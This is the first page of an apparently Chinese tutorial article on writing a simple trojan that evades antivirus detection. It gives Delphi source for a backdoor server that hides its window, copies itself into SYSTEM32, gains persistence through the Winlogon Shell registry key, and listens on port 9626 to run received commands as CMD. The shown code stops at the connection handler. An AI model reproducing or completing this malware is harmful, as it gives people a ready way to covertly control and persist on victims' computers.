Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / 编写属于自己不被查杀的简单木马

刚学电脑时很喜欢网络安全,看着高手们写的一个又一个攻击工具,自己也总想努力去学好编程去写属于自己的程序。学DELPHI快一年了,感觉什么都没学到,惭愧啊。今晚突然想学着写木马,于是手忙脚乱的敲了点代码,超简单,愿自己能越写越好!!!

程序跟传统木马一样,分服务端和客户端。运行服务端后会复制自身到SYSTEM32目录下面,并在注册表添加一自动行启动项,打开本机9626端口开始等待接收客户端的数据。当接收到客户端数据时就当作CMD命令去执行,最后把回显传送回客户端。客户端很简单,跟服务端连接成功后,输入命令点执行,正常的话可以收到服务端的执行结果了。



源码如下:

////Server.pas//////////////

unit UtMain;

////////////////////////////////////
//////////BY lanyus////////////////
////////Email:greathjw@163.com////
////////QQ:231221////////////////
///部分代码从网上收集///////////
////////////////////////////////

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Registry, ScktComp, StdCtrls;

type
TFmMain = class(TForm)
SS: TServerSocket;
Memo1: TMemo;
procedure FormCreate(Sender: TObject);
procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
private
{ Private declarations }
public
{ Public declarations }
end;

var
FmMain: TFmMain;
reg:TRegistry;

implementation

{$R *.dfm}

procedure TFmMain.FormCreate(Sender: TObject);
var
sysdir:array[0..50] of char;
begin
Application.ShowMainForm:=False;
FmMain.Left:=-200;     //运行不显示窗口
reg:=TRegistry.Create;
reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey("SoftWareMicrosoftWindows NTCurrentVersionWinlogon",true);
if reg.ReadString("Shell")<> "Explorer.exe Lysvr.exe" then
reg.WriteString("Shell","Explorer.exe Lysvr.exe");   //建立开机启动项
reg.Free;
GetSystemDirectory(sysdir,50);
if not FileExists(sysdir+"Lysvr.exe") then
copyfile(Pchar(Application.exeName),pchar(sysdir+"Lysvr.exe"),true);

SS.Port:=9626;
try
SS.Active:=True;
except
end;
end;

procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
begin
Socket.SendText("连接成功");   //发现有连接时回传‘连接成功 ’
end;
  • 1
  • 2
  • 下一页
【内容导航】
第1页:编写属于自己不被查杀的简单木马第2页:编写属于自己不被查杀的简单木马
小心防范 “泽拉丁”变种DZ与“浩方大盗”变种MC做好无线网络安全 保卫在空气中传播的信息相关资讯      木马 
  • 木马的自我修炼:金融恶意程序f0xy  (02/03/2015 09:24:18)
  • 恶意软件趋势:跨平台恶意软件崛起  (11/12/2012 12:04:05)
  • Zemra 木马源代码泄露  (07/04/2012 07:37:03)
  • 安全研究人员:更多木马将目标锁定  (11/22/2012 09:29:20)
  • McAfee:90%成移动恶意程序锁定  (09/07/2012 05:46:33)
  • Flame恶意软件被设计为可窃取图纸  (06/06/2012 01:35:29)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图